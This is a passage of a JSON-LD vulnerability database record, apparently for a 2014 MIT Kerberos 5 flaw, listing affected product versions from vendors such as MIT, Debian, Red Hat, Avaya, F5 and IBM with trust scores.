Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201408-0299", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "linux", "scope": "eq", "trust": 1.6, "vendor": "debian", "version": "7.0" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.10.1" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.11.3" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.10" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.11.4" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.10.2" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.11.1" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.12" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.11.2" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.10.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.12.1" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.11.5" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.11" }, { "model": "kerberos 5", "scope": "eq", "trust": 1.0, "vendor": "mit", "version": "1.10.4" }, { "model": "kerberos", "scope": "lt", "trust": 0.8, "vendor": "mit kerberos", "version": "1.5.x from 1.12.x" }, { "model": "kerberos", "scope": "eq", "trust": 0.8, "vendor": "mit kerberos", "version": "5 1.12.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.11.4" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.6" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.6.2" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.8.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.8" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.11.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "one-x client enablement services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura application server sip core pb19", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.8.4" }, { "model": "aura conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.5" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.9" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.11.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.8.1" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10.4" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.9.5" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core pb25", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.7" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.6" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.6.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.5.5" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10.2" }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.12" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.11.2" }, { "model": "aura application server sip core pb3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.5.3" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.5.4" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.6.1" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10.3" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "aura application server sip core pb26", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura application server sip core pb28", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "big-ip edge gateway hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.8.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura application server sip core pb16", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.12.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.6.4" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "kerberos", "scope": "ne", "trust": 0.3, "vendor": "mit", "version": "51.12.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.5.2" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.7.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10.1" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aura messaging sp4", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10.6" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.7.2" }, { "model": "big-ip edge gateway hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "aura application server sip core pb23", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.7" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.5.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "kerberos", "scope": "eq", "trust": 0.3, "vendor": "mit", "version": "51.10.7" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.4" }, { "model": 